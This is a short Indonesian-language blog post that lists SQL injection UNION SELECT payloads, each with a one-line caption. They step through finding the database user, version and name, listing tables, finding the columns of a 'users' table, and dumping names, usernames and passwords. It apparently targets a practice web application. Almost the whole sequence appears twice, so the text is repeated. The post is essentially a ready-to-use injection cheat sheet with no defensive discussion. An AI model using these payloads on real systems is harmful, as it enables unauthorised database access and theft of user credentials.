Charlie Sierra
Untuk melihat nama user database, menggunakan command berikut
‘union select null,user() #’
Untuk melihat versi database, bisa menggunakan command berikut
‘union select null,version() #’
Untuk melihat nama database, bisa menggunakan command berikut
‘union select null,database() #’
melihat tabel apa saja yang ada pada
database, ketikan command berikut
‘union select null,table_name from information_schema.tables #’
mencari database yang berisikan tabel dengan nama
yang mengandung kata user, ketikan command berikut
‘union select null,table_name from information_schema.tables where
table_name like ‘user%’ #’
melihat isi kolom yang ada pada
tabel users
‘union select null,concat (column_name) from
information_schema.columns where table_name = ‘users’ #’
mendapatkan informasi yang
berisikan firstname, lastname, username, dan password.
‘union select null, concat (first_name, 0x0a, last_name, 0x0a, user, 0x0a,
password) from users #’
‘union select null,user() #’
Untuk melihat versi database, bisa menggunakan command berikut
‘union select null,version() #’
Untuk melihat nama database, bisa menggunakan command berikut
‘union select null,database() #’
melihat tabel apa saja yang ada pada
database, ketikan command berikut
‘union select null,table_name from information_schema.tables #’
mencari database yang berisikan tabel dengan nama
yang mengandung kata user, ketikan command berikut
‘union select null,table_name from information_schema.tables where
table_name like ‘user%’ #’
melihat isi kolom yang ada pada
tabel users
‘union select null,concat (column_name) from
information_schema.columns where table_name = ‘users’ #’
mendapatkan informasi yang
berisikan firstname, lastname, username, dan password.
‘union select null, concat (first_name, 0x0a, last_name, 0x0a, user, 0x0a,
password) from users #’
Komentar
Posting Komentar